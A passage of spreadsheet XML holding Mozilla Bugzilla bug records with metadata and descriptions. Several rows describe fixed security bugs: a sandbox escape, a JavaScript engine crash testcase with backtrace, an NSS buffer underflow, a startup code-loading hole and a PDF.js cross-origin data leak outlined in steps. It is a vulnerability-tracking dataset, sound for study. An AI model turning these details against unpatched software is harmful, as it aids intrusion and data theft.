      <c r="B5085" t="inlineStr">
        <is>
          <t>2000-07-11 00:36:52 -0700</t>
        </is>
      </c>
      <c r="C5085" t="inlineStr">
        <is>
          <t>Above -&gt; Below</t>
        </is>
      </c>
      <c r="D5085" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E5085" t="n">
        <v>1</v>
      </c>
      <c r="F5085" t="n">
        <v>1</v>
      </c>
      <c r="G5085" t="n">
        <v>4</v>
      </c>
      <c r="H5085" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5085" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5085" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5085" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5085" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5085" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5085" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5085" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q5085" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5085" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S5085" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T5085" t="n">
        <v>1</v>
      </c>
      <c r="U5085" t="n">
        <v>0</v>
      </c>
      <c r="V5085" t="n">
        <v>7</v>
      </c>
      <c r="W5085" t="inlineStr">
        <is>
          <t>editparams.cgi:
"If off, then all bugs initially have the default priority selected above."
-&gt;
"If off, then all bugs initially have the default priority selected below."</t>
        </is>
      </c>
      <c r="X5085" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5086">
      <c r="A5086" t="n">
        <v>1600625</v>
      </c>
      <c r="B5086" t="inlineStr">
        <is>
          <t>2019-12-02 06:51:10 -0800</t>
        </is>
      </c>
      <c r="C5086" t="inlineStr">
        <is>
          <t>need-investigagtion jobs subsequently green should be moved to known-intermittents</t>
        </is>
      </c>
      <c r="D5086" t="inlineStr">
        <is>
          <t>2020-01-02 14:46:37 -0800</t>
        </is>
      </c>
      <c r="E5086" t="n">
        <v>1</v>
      </c>
      <c r="F5086" t="n">
        <v>1</v>
      </c>
      <c r="G5086" t="n">
        <v>7</v>
      </c>
      <c r="H5086" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5086" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5086" t="inlineStr">
        <is>
          <t>Push Health</t>
        </is>
      </c>
      <c r="K5086" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5086" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5086" t="inlineStr"/>
      <c r="Q5086" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5086" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5086" t="n">
        <v>1</v>
      </c>
      <c r="U5086" t="n">
        <v>0</v>
      </c>
      <c r="V5086" t="n">
        <v>7</v>
      </c>
      <c r="W5086" t="inlineStr">
        <is>
          <t>if you retrigger need-investigation job which subsequently goes green, then this is a good indication this is an intermittent, and thus should be moved to known-intermittents to not draw attention unnecessary.
It could do false-positives, for example, if the patch introduces new intermittents, but I suppose such jobs can be marked by a flag like 'subsequently green', so developer will be notified about potential problem.</t>
        </is>
      </c>
      <c r="X5086" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5087">
      <c r="A5087" t="n">
        <v>1559858</v>
      </c>
      <c r="B5087" t="inlineStr">
        <is>
          <t>2019-06-17 19:21:27 -0700</t>
        </is>
      </c>
      <c r="C5087" t="inlineStr">
        <is>
          <t>Sending `Prompt:Open` from the child allows for a sandbox escape</t>
        </is>
      </c>
      <c r="D5087" t="inlineStr">
        <is>
          <t>2024-05-02 07:57:31 -0700</t>
        </is>
      </c>
      <c r="E5087" t="n">
        <v>1</v>
      </c>
      <c r="F5087" t="n">
        <v>1</v>
      </c>
      <c r="G5087" t="n">
        <v>2</v>
      </c>
      <c r="H5087" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5087" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5087" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5087" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5087" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5087" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5087" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5087" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5087" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q5087" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5087" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5087" t="inlineStr">
        <is>
          <t>Firefox 69</t>
        </is>
      </c>
      <c r="T5087" t="n">
        <v>1</v>
      </c>
      <c r="U5087" t="n">
        <v>0</v>
      </c>
      <c r="V5087" t="n">
        <v>31</v>
      </c>
      <c r="W5087" t="inlineStr">
        <is>
          <t>A successful exploit in the child process may use the messageManager to request itself (or really any URL) being opened in the parent process with the `Prompt:Open` message.
This allows for running the exploit again and thus bypassing the sandbox.</t>
        </is>
      </c>
      <c r="X5087" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5088">
      <c r="A5088" t="n">
        <v>518806</v>
      </c>
      <c r="B5088" t="inlineStr">
        <is>
          <t>2009-09-25 04:05:50 -0700</t>
        </is>
      </c>
      <c r="C5088" t="inlineStr">
        <is>
          <t>make getpersonas.com deliver lightweight themes to Firefox 3.6</t>
        </is>
      </c>
      <c r="D5088" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E5088" t="n">
        <v>1</v>
      </c>
      <c r="F5088" t="n">
        <v>1</v>
      </c>
      <c r="G5088" t="n">
        <v>6</v>
      </c>
      <c r="H5088" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5088" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J5088" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K5088" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5088" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5088" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5088" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5088" t="inlineStr"/>
      <c r="Q5088" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5088" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5088" t="n">
        <v>1</v>
      </c>
      <c r="U5088" t="n">
        <v>0</v>
      </c>
      <c r="V5088" t="n">
        <v>22</v>
      </c>
      <c r="W5088" t="inlineStr">
        <is>
          <t>Firefox 3.6 will support the following events:
InstallBrowserTheme (formerly SelectPersona)
PreviewBrowserTheme (formerly PreviewPersona)
ResetBrowserThemePreview (formerly ResetPersona)
The attribute that contains the JSON data is called "data-browsertheme" (formerly "persona").
Attachment 399709 is an example for that.</t>
        </is>
      </c>
      <c r="X5088" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5089">
      <c r="A5089" t="n">
        <v>1186962</v>
      </c>
      <c r="B5089" t="inlineStr">
        <is>
          <t>2015-07-23 09:53:34 -0700</t>
        </is>
      </c>
      <c r="C5089" t="inlineStr">
        <is>
          <t>Assertion failure: opn-&gt;isArity(PN_NAME), at frontend/ParseNode.cpp:852 or Crash [@ js::frontend::BytecodeEmitter::emitTree] with Arrow function</t>
        </is>
      </c>
      <c r="D5089" t="inlineStr">
        <is>
          <t>2016-09-13 03:03:36 -0700</t>
        </is>
      </c>
      <c r="E5089" t="n">
        <v>1</v>
      </c>
      <c r="F5089" t="n">
        <v>1</v>
      </c>
      <c r="G5089" t="n">
        <v>3</v>
      </c>
      <c r="H5089" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5089" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5089" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5089" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5089" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5089" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5089" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5089" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q5089" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5089" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5089" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5089" t="n">
        <v>1</v>
      </c>
      <c r="U5089" t="n">
        <v>0</v>
      </c>
      <c r="V5089" t="n">
        <v>21</v>
      </c>
      <c r="W5089" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 2ddec2dedced (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2):
for (var { __proto__: {  } = (  ) =&gt; current } in {}) {}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000555551 in js::frontend::BytecodeEmitter::emitTree (this=this@entry=0x7fffffffc530, pn=pn@entry=0x0) at js/src/frontend/BytecodeEmitter.cpp:7529
#0  0x0000000000555551 in js::frontend::BytecodeEmitter::emitTree (this=this@entry=0x7fffffffc530, pn=pn@entry=0x0) at js/src/frontend/BytecodeEmitter.cpp:7529
#1  0x0000000000558c5d in js::frontend::BytecodeEmitter::emitDefault (this=0x7fffffffc530, defaultExpr=0x0) at js/src/frontend/BytecodeEmitter.cpp:3820
#2  0x000000000055b417 in js::frontend::BytecodeEmitter::emitDestructuringOpsObjectHelper (this=this@entry=0x7fffffffc530, pattern=pattern@entry=0x7ffff69913a0, emitOption=emitOption@entry=js::frontend::InitializeVars) at js/src/frontend/BytecodeEmitter.cpp:4022
#3  0x000000000055adbb in js::frontend::BytecodeEmitter::emitDestructuringOpsHelper (this=this@entry=0x7fffffffc530, pattern=pattern@entry=0x7ffff69913a0, emitOption=emitOption@entry=js::frontend::InitializeVars) at js/src/frontend/BytecodeEmitter.cpp:4107
#4  0x000000000055a028 in emitDestructuringOps (isLet=false, pattern=0x7ffff69913a0, this=0x7fffffffc530) at js/src/frontend/BytecodeEmitter.cpp:4118
#5  js::frontend::BytecodeEmitter::emitAssignment (this=this@entry=0x7fffffffc530, lhs=0x7ffff69913a0, op=op@entry=JSOP_NOP, rhs=rhs@entry=0x0) at js/src/frontend/BytecodeEmitter.cpp:4580
#6  0x000000000055bdde in js::frontend::BytecodeEmitter::emitForIn (this=0x7fffffffc530, pn=&lt;optimized out&gt;, top=&lt;optimized out&gt;) at js/src/frontend/BytecodeEmitter.cpp:5492
#7  0x000000000055c4a5 in js::frontend::BytecodeEmitter::emitFor (this=this@entry=0x7fffffffc530, pn=pn@entry=0x7ffff69914b8, top=top@entry=0) at js/src/frontend/BytecodeEmitter.cpp:5708
#8  0x0000000000555898 in js::frontend::BytecodeEmitter::emitTree (this=this@entry=0x7fffffffc530, pn=0x7ffff69914b8) at js/src/frontend/BytecodeEmitter.cpp:7646
#9  0x0000000000556e45 in js::frontend::CompileScript (cx=cx@entry=0x7ffff6981040, alloc=&lt;optimized out&gt;, scopeChain=..., enclosingStaticScope=..., enclosingStaticScope@entry=..., evalCaller=..., evalCaller@entry=..., options=..., srcBuf=..., source_=source_@entry=0x0, staticLevel=staticLevel@entry=0, extraSct=extraSct@entry=0x0) at js/src/frontend/BytecodeCompiler.cpp:409
#10 0x000000000089ca36 in Compile (cx=cx@entry=0x7ffff6981040, options=..., scopeOption=scopeOption@entry=HasSyntacticScope, srcBuf=..., script=script@entry=...) at js/src/jsapi.cpp:3931
#11 0x000000000089cb3f in Compile (script=..., length=&lt;optimized out&gt;, chars=0x7ffff6902e80 u"for (var { __proto__: {  } = (  ) =&gt; current } in {}) {}\n", scopeOption=HasSyntacticScope, options=..., cx=0x7ffff6981040) at js/src/jsapi.cpp:3940
#12 Compile (cx=cx@entry=0x7ffff6981040, options=..., scopeOption=scopeOption@entry=HasSyntacticScope, bytes=&lt;optimized out&gt;, length=57, script=script@entry=...) at js/src/jsapi.cpp:3955
#13 0x00000000008c1fb1 in Compile (script=..., fp=0x7fffffffd880, scopeOption=HasSyntacticScope, options=..., cx=cx@entry=0x7ffff6981040) at js/src/jsapi.cpp:3966
#14 JS::Compile (cx=cx@entry=0x7ffff6981040, options=..., file=file@entry=0x7ffff6997800, script=script@entry=...) at js/src/jsapi.cpp:4006
#15 0x0000000000426063 in RunFile (compileOnly=false, file=0x7ffff6997800, filename=&lt;optimized out&gt;, cx=0x7ffff6981040) at js/src/shell/js.cpp:449
#16 Process (cx=cx@entry=0x7ffff6981040, filename=&lt;optimized out&gt;, forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:576
#17 0x000000000043657d in ProcessArgs (op=0x7fffffffdbc0, cx=0x7ffff6981040) at js/src/shell/js.cpp:5771
#18 Shell (envp=&lt;optimized out&gt;, op=0x7fffffffdbc0, cx=0x7ffff6981040) at js/src/shell/js.cpp:6040
#19 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6384
rax	0x7fffffffc5d8	140737488340440
rbx	0x7fffffffc530	140737488340272
rcx	0x51	81
rdx	0x7ffff693c0a0	140737330266272
rsi	0x0	0
rdi	0x7fffffffc530	140737488340272
rbp	0x0	0
rsp	0x7fffffffbf20	140737488338720
r8	0x7ffff691b6b0	140737330132656
r9	0x7ffff691b6b0	140737330132656
r10	0x7ffff6913400	140737330099200
r11	0x7ffff47ad680	140737295079040
r12	0x7ffff69913d8	140737330615256
r13	0x2	2
r14	0x7fffffffbf30	140737488338736
r15	0x1	1
rip	0x555551 &lt;js::frontend::BytecodeEmitter::emitTree(js::frontend::ParseNode*)+113&gt;
=&gt; 0x555551 &lt;js::frontend::BytecodeEmitter::emitTree(js::frontend::ParseNode*)+113&gt;:	mov    0x4(%rbp),%esi
   0x555554 &lt;js::frontend::BytecodeEmitter::emitTree(js::frontend::ParseNode*)+116&gt;:	mov    0x10(%rax),%r13</t>
        </is>
      </c>
      <c r="X5089" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5090">
      <c r="A5090" t="n">
        <v>1867408</v>
      </c>
      <c r="B5090" t="inlineStr">
        <is>
          <t>2023-11-29 16:03:05 -0800</t>
        </is>
      </c>
      <c r="C5090" t="inlineStr">
        <is>
          <t>Crash in  [@ ssl_SendSavedWriteData | ssl3_SendRecord | ssl3_FlushHandshakeMessages | ssl3_FlushHandshake | tls13_SendClientSecondFlight ]</t>
        </is>
      </c>
      <c r="D5090" t="inlineStr">
        <is>
          <t>2024-05-14 21:13:49 -0700</t>
        </is>
      </c>
      <c r="E5090" t="n">
        <v>1</v>
      </c>
      <c r="F5090" t="n">
        <v>1</v>
      </c>
      <c r="G5090" t="n">
        <v>3</v>
      </c>
      <c r="H5090" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5090" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5090" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5090" t="inlineStr">
        <is>
          <t>3.95</t>
        </is>
      </c>
      <c r="L5090" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5090" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5090" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5090" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main122+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q5090" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5090" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5090" t="inlineStr">
        <is>
          <t>3.96</t>
        </is>
      </c>
      <c r="T5090" t="n">
        <v>1</v>
      </c>
      <c r="U5090" t="n">
        <v>0</v>
      </c>
      <c r="V5090" t="n">
        <v>10</v>
      </c>
      <c r="W5090" t="inlineStr">
        <is>
          <t>We see a few hundred instances per month of an EXC_BAD_ACCESS crash in `ssl_SendSavedWriteData` on macOS.
The crash is in [this memmove](https://searchfox.org/mozilla-central/rev/12ea2c521cdd071a6d25b0894f31f8f23b18b76a/security/nss/lib/ssl/sslsecur.c#494-495):
```c
        rv = ssl_DefSend(ss, ss-&gt;pendingBuf.buf, ss-&gt;pendingBuf.len, 0);
        if (rv &lt; 0) {
            return rv;
        }
        ss-&gt;pendingBuf.len -= rv;
        if (ss-&gt;pendingBuf.len &gt; 0 &amp;&amp; rv &gt; 0) {
            /* UGH !! This shifts the whole buffer down by copying it */
            PORT_Memmove(ss-&gt;pendingBuf.buf, ss-&gt;pendingBuf.buf + rv,
                         ss-&gt;pendingBuf.len);
        }
```
We're failing to check that  `ss-&gt;pendingBuf.len &gt;= rv` before performing `ss-&gt;pendingBuf.len -= rv;`. The `ss-&gt;pendingBuf.len &gt; 0` clause in the if statement won't catch this error because `ss-&gt;pendingBuf.len` is unsigned.
I'll post a patch to avoid the symptom, but the underlying problem (`rv &gt; ss-&gt;pendingBuf.len`) should also be addressed. I don't know the code (or macOS) well enough to see why that would happen.</t>
        </is>
      </c>
      <c r="X5090" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5091">
      <c r="A5091" t="n">
        <v>492024</v>
      </c>
      <c r="B5091" t="inlineStr">
        <is>
          <t>2009-05-08 06:49:41 -0700</t>
        </is>
      </c>
      <c r="C5091" t="inlineStr">
        <is>
          <t>ZCT collection and pruning policy</t>
        </is>
      </c>
      <c r="D5091" t="inlineStr">
        <is>
          <t>2009-10-14 14:36:21 -0700</t>
        </is>
      </c>
      <c r="E5091" t="n">
        <v>1</v>
      </c>
      <c r="F5091" t="n">
        <v>1</v>
      </c>
      <c r="G5091" t="n">
        <v>6</v>
      </c>
      <c r="H5091" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5091" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J5091" t="inlineStr">
        <is>
          <t>Garbage Collection (mmGC)</t>
        </is>
      </c>
      <c r="K5091" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5091" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5091" t="inlineStr"/>
      <c r="Q5091" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5091" t="inlineStr">
        <is>
          <t>flash10.1</t>
        </is>
      </c>
      <c r="T5091" t="n">
        <v>1</v>
      </c>
      <c r="U5091" t="n">
        <v>0</v>
      </c>
      <c r="V5091" t="n">
        <v>16</v>
      </c>
      <c r="W5091" t="inlineStr">
        <is>
          <t>It's possible that ZCT reaping can impose too-large pauses if the ZCT grows large; we should be mindful of this.
If the ZCT population shrinks after the ZCT structure has grown, we should consider shrining the ZCT structure.
The ZCT should not be a single block (tends to grow the heap as large objects are allocated; imposes copying cost) but should be allocated in smaller pieces.</t>
        </is>
      </c>
      <c r="X5091" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5092">
      <c r="A5092" t="n">
        <v>1295542</v>
      </c>
      <c r="B5092" t="inlineStr">
        <is>
          <t>2016-08-16 04:07:05 -0700</t>
        </is>
      </c>
      <c r="C5092" t="inlineStr">
        <is>
          <t>Firefox tries to read a non existent chrome.manifest from install directory.</t>
        </is>
      </c>
      <c r="D5092" t="inlineStr">
        <is>
          <t>2019-10-23 04:09:36 -0700</t>
        </is>
      </c>
      <c r="E5092" t="n">
        <v>1</v>
      </c>
      <c r="F5092" t="n">
        <v>1</v>
      </c>
      <c r="G5092" t="n">
        <v>3</v>
      </c>
      <c r="H5092" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5092" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5092" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K5092" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L5092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5092" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q5092" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5092" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5092" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T5092" t="n">
        <v>1</v>
      </c>
      <c r="U5092" t="n">
        <v>0</v>
      </c>
      <c r="V5092" t="n">
        <v>30</v>
      </c>
      <c r="W5092" t="inlineStr">
        <is>
          <t>When you open Firefox, you'll see this message on the console:
Could not read chrome manifest 'file:///Applications/Firefox.app/Contents/Resources/chrome.manifest'.
Because of this, you can drop a chrome.manifest file and a Javascript component into the Firefox install directory and have it loaded at startup without modifying any existing files.
I've verified this on Windows.</t>
        </is>
      </c>
      <c r="X5092" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5093">
      <c r="A5093" t="n">
        <v>798678</v>
      </c>
      <c r="B5093" t="inlineStr">
        <is>
          <t>2012-10-05 18:44:22 -0700</t>
        </is>
      </c>
      <c r="C5093" t="inlineStr">
        <is>
          <t>WeakMaps with keys from another compartment are possible and incorrect</t>
        </is>
      </c>
      <c r="D5093" t="inlineStr">
        <is>
          <t>2014-04-22 03:33:25 -0700</t>
        </is>
      </c>
      <c r="E5093" t="n">
        <v>1</v>
      </c>
      <c r="F5093" t="n">
        <v>1</v>
      </c>
      <c r="G5093" t="n">
        <v>3</v>
      </c>
      <c r="H5093" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5093" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5093" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5093" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5093" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5093" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5093" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5093" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5093" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5093" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5093" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5093" t="n">
        <v>1</v>
      </c>
      <c r="U5093" t="n">
        <v>0</v>
      </c>
      <c r="V5093" t="n">
        <v>52</v>
      </c>
      <c r="W5093" t="inlineStr">
        <is>
          <t>This is a regression from bug 673468. Somehow I convinced myself this was okay, but I'm now pretty sure that we can have problems from this. I'll try to get a testcase on Monday.</t>
        </is>
      </c>
      <c r="X5093" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5094">
      <c r="A5094" t="n">
        <v>1683940</v>
      </c>
      <c r="B5094" t="inlineStr">
        <is>
          <t>2020-12-22 10:53:13 -0800</t>
        </is>
      </c>
      <c r="C5094" t="inlineStr">
        <is>
          <t>Cross-origin information leakage via redirected PDF requests</t>
        </is>
      </c>
      <c r="D5094" t="inlineStr">
        <is>
          <t>2021-04-04 19:08:33 -0700</t>
        </is>
      </c>
      <c r="E5094" t="n">
        <v>1</v>
      </c>
      <c r="F5094" t="n">
        <v>1</v>
      </c>
      <c r="G5094" t="n">
        <v>2</v>
      </c>
      <c r="H5094" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5094" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5094" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K5094" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5094" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5094" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5094" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5094" t="inlineStr">
        <is>
          <t>[adv-main85+][adv-esr78.7+][sec-survey]</t>
        </is>
      </c>
      <c r="Q5094" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5094" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5094" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T5094" t="n">
        <v>1</v>
      </c>
      <c r="U5094" t="n">
        <v>0</v>
      </c>
      <c r="V5094" t="n">
        <v>23</v>
      </c>
      <c r="W5094" t="inlineStr">
        <is>
          <t>I posted a write-up of a vulnerability in the networking code of PDF.js at https://github.com/mozilla/pdf.js/issues/12744
In short, when multiple network requests are sent for parts of the PDF file, responses that belong to a different origin (e.g. due to redirects) should be rejected. This does not happen.
After some code inspection, I found that the vulnerability can currently be exploited under some specific circumstances circumstances. The only requirements for exploitation are:
- Victim website (from where cross-origin data is stolen) responds to Range requests with HTTP 206.
   - note: the fact [that HTTP 206 is required](https://searchfox.org/mozilla-central/rev/5a90b263f71b558fd14bade65b0c4ae5e216e646/toolkit/components/pdfjs/content/PdfJsNetwork.jsm#171-183) slightly lessens the impact, since it means that servers that don't respond to Range requests (I suppose most regular web content would more likely respond with HTTP 200 than 206) aren't affected.
- Limited user interaction: User must click once in an attacker-controlled area (rendered PDF file).
To carry out the attack:
1. Prepare a server that serves the head and tail of a crafted PDF file that triggers the Range request mode of PDF (=loading PDF data in chunks over the network). In between the head and tail, at a well-chosen offset, there are redirects for Range requests to the victim website.
2. To the PDF viewer, the generated PDF file looks like a regular PDF file that contains a link (e.g. the `GoToR` action).
3. By the construction of the PDF at step 1, any click within the PDF file will trigger a navigation to the URL, and the URL will contain the cross-origin data (from the redirection target).
4. To execute the exploit, the user must be tricked into clicking in the PDF.
I haven't attached a PoC because I haven't bothered with constructing a PoC server with a good head/tail + offsets that triggers the vulnerable code path in PDF.js, but I did create such a PoC before in https://crbug.com/653749 (CVE-2016-5206).</t>
        </is>
      </c>
      <c r="X5094" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5095">
      <c r="A5095" t="n">
        <v>104589</v>
      </c>
      <c r="B5095" t="inlineStr">
        <is>
          <t>2001-10-13 10:15:35 -0700</t>
        </is>
      </c>
      <c r="C5095" t="inlineStr">
        <is>
          <t>User closing window should not terminate Bugzilla scripts (quick fix for 2.16)</t>
        </is>
      </c>
      <c r="D5095" t="inlineStr">
        <is>
